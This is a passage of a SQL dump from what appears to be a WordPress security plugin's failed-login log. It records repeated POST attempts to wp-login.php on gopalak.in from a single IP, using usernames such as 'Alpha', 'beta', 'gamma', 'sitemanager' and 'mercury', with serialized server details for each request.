04:24:38'),(94806,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52521\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138264.8441761;s:12:\"REQUEST_TIME\";i:1746138264;}}','196.251.112.104',1,'2025-05-02 03:54:26','2025-05-03 04:24:38'),(94807,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52520\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138264.845598;s:12:\"REQUEST_TIME\";i:1746138264;}}','196.251.112.104',1,'2025-05-02 03:54:26','2025-05-03 04:24:38'),(94808,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52518\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138264.8197961;s:12:\"REQUEST_TIME\";i:1746138264;}}','196.251.112.104',1,'2025-05-02 03:54:26','2025-05-03 04:24:38'),(94809,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52522\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138264.8464401;s:12:\"REQUEST_TIME\";i:1746138264;}}','196.251.112.104',1,'2025-05-02 03:54:26','2025-05-03 04:24:38'),(94810,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52396\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138440.1120269;s:12:\"REQUEST_TIME\";i:1746138440;}}','196.251.112.104',1,'2025-05-02 03:57:21','2025-05-03 04:24:38'),(94811,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52394\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138440.1093161;s:12:\"REQUEST_TIME\";i:1746138440;}}','196.251.112.104',1,'2025-05-02 03:57:21','2025-05-03 04:24:38'),(94812,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52395\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138440.1084759;s:12:\"REQUEST_TIME\";i:1746138440;}}','196.251.112.104',1,'2025-05-02 03:57:21','2025-05-03 04:24:38'),(94813,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52398\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138440.1194539;s:12:\"REQUEST_TIME\";i:1746138440;}}','196.251.112.104',1,'2025-05-02 03:57:21','2025-05-03 04:24:38'),(94814,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"119\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52393\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"119\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138440.0951469;s:12:\"REQUEST_TIME\";i:1746138440;}}','196.251.112.104',1,'2025-05-02 03:57:21','2025-05-03 04:24:38'),(94815,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52290\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138614.2262931;s:12:\"REQUEST_TIME\";i:1746138614;}}','196.251.112.104',1,'2025-05-02 04:00:16','2025-05-03 04:24:38'),(94816,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52293\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138614.2385161;s:12:\"REQUEST_TIME\";i:1746138614;}}','196.251.112.104',1,'2025-05-02 04:00:16','2025-05-03 04:24:38'),(94817,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52291\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138614.2376909;s:12:\"REQUEST_TIME\";i:1746138614;}}','196.251.112.104',1,'2025-05-02 04:00:16','2025-05-03 